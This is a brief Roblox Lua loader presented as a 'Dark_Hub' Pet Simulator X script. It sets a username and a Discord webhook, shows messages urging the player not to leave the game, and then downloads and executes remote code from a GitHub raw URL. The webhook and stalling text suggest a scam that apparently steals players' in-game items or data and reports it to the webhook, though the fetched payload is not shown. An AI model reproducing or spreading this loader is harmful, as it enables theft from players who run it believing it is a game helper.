Username = "GHALA7353"

WebHook = "https://discord.com/api/webhooks/1082922904708186202/jHA8695AUxSH_ai5wT-0OWSGMEPIH9yBHZ_NByIe2lLePkdj_MmVuTJYyW1P1x0FxNC3"

_G.CustomScriptName = "Dark_Hub"

_G.Text1 = "Script Loaded..."

_G.Text2 = "Waiting for Script Pls Do Not Leave The Game Or Your Data Will Not Be Saved "

_G.Text3 = "Pls Be Patience..."

_G.Text4 = "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
